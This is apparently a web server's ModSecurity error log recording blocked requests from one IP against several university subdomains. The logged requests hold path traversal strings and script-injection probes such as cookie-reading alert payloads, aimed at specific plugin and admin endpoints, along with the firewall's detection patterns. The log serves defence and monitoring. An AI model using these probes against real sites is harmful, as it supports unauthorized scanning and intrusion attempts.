[Tue Aug 29 11:57:00.845245 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAAoz8WUAAAAS"]
[Tue Aug 29 11:57:01.029143 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAm80SgAAAAF"]
[Tue Aug 29 11:57:01.049493 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16ncCo-f0AAAm80SkAAAAF"]
[Tue Aug 29 11:57:01.566453 2023] [:error] [pid 2780] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAArcTMUAAAAH"]
[Tue Aug 29 11:57:01.635274 2023] [:error] [pid 2780] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAArcTMcAAAAH"]
[Tue Aug 29 11:57:01.656505 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAolLA0AAAAe"]
[Tue Aug 29 11:57:01.658424 2023] [:error] [pid 2780] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAArcTMgAAAAH"]
[Tue Aug 29 11:57:01.705428 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAolLA8AAAAe"]
[Tue Aug 29 11:57:01.714093 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAq5@a8AAAAK"]
[Tue Aug 29 11:57:01.724856 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAArB19wAAAAV"]
[Tue Aug 29 11:57:01.756859 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAoz8WwAAAAS"]
[Tue Aug 29 11:57:01.759220 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAolLBEAAAAe"]
[Tue Aug 29 11:57:02.579463 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAArB1@QAAAAV"]
[Tue Aug 29 11:57:02.684486 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAq5@bgAAAAK"]
[Tue Aug 29 11:57:02.688231 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAq-HnoAAAAT"]
[Tue Aug 29 11:57:02.688539 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAArB1@gAAAAV"]
[Tue Aug 29 11:57:02.747552 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16nsCo-f0AAAq-Hn0AAAAT"]
[Tue Aug 29 11:57:02.763577 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAq5@bwAAAAK"]
[Tue Aug 29 11:57:02.764272 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nsCo-f0AAArbWR4AAAAG"]
[Tue Aug 29 11:57:02.804135 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nsCo-f0AAAq5@b4AAAAK"]
[Tue Aug 29 11:57:03.563482 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16n8Co-f0AAAoz8XIAAAAS"]
[Tue Aug 29 11:57:04.108564 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16oMCo-f0AAAq5@cMAAAAK"]
[Tue Aug 29 11:57:05.533166 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAArbWToAAAAG"]
[Tue Aug 29 11:57:05.577540 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAqqtpcAAAAA"]
[Tue Aug 29 11:57:05.585078 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAArbWTsAAAAG"]
